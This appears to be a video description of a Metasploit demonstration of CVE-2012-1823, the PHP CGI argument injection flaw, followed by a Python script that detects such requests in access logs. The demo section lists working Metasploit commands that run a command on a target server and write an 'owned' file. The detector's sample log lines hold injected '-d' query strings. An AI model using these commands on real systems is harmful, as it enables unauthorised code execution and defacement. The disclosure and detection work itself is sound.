CVE-2012-1823 PHP CGI Argument Injection Metasploit Demo











Video: http://youtube.com/watch?v=ZcUsR9DSSOk

Subscribe: http://www.youtube.com/subscription_c...
Blog: http://eromang.zataz.com
Twitter: / eromang

Timeline:
• Vulnerability discovered at Nullcon Hackim 2012 by eindbazen on 2012-01-13
• Vulnerability reported to the vendor on 2012-01-17
• Vulnerability accidentally disclosed on the PHP bug tracking system on 2012-05-03
• Coordinated public release of the vulnerability on 2012-05-03
• Metasploit PoC provided on 2012-05-04

PoC provided by:
• egypt
• hdm

Reference(s):
• CVE-2012-1823
• OSVDB-81633

Affected versions:
• PHP versions before 5.3.12
• PHP versions before 5.4.2

Tested on CentOS release 6.2 (Final) with:
• php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012

Description:
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: if there is NO unescaped '=' in the query string, the string is split on '+' (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the "encoded in a system-defined manner" from the RFC) and then passes them to the CGI binary.

Note: This vulnerability was potentially exploited in the wild for at least 8 years!

Metasploit demo:
• use exploit/multi/http/php_cgi_arg_injection
• set RHOST 192.168.178.210
• set TARGETURI /phpinfo.php
• set PAYLOAD php/exec
• set CMD echo owned /var/www/html/owned.html
• exploit
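
The query-string rule quoted from the advisory can be turned into a log check for defenders. The following is an added example, not part of the original video description or the Metasploit module: it assumes combined-format web access logs, and the function names, sample log lines and the directive name `example_directive` are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original page).
SAMPLE_LOG = [
    '198.51.100.7 - - [04/May/2012:10:00:01 +0000] "GET /phpinfo.php?-d+example_directive%3d1 HTTP/1.1" 200 512',
    '198.51.100.7 - - [04/May/2012:10:00:02 +0000] "GET /phpinfo.php?%2dd+example_directive%3d1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [04/May/2012:10:00:03 +0000] "GET /index.php?page=2&sort=-date HTTP/1.1" 200 812',
    '203.0.113.9 - - [04/May/2012:10:00:04 +0000] "GET /search.php?php+cgi HTTP/1.1" 200 640',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def cgi_args_from_query(query):
    """Mirror the advisory's rule: with no unescaped '=' in the query string,
    the string is split on '+' and each piece is urldecoded into an argument.
    Returns the resulting argument list, or [] for a normal key=value query."""
    if not query or "=" in query:
        return []
    return [unquote(part) for part in query.split("+")]


def is_argument_injection(line):
    """True if the logged request would hand an option-like argument
    (one starting with '-') to the PHP CGI binary."""
    match = REQUEST_RE.search(line)
    if not match or "?" not in match.group("target"):
        return False
    query = match.group("target").split("?", 1)[1]
    return any(arg.startswith("-") for arg in cgi_args_from_query(query))


def flag_lines(lines):
    """Return the log lines that match the argument-injection pattern."""
    return [line for line in lines if is_argument_injection(line)]


if __name__ == "__main__":
    for hit in flag_lines(SAMPLE_LOG):
        print("SUSPICIOUS:", hit)
```

Decoding each piece before testing for a leading '-' is what catches the second sample line, where the dash is sent as %2d; the third line is ignored because its literal '=' means the query string is never split into arguments.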
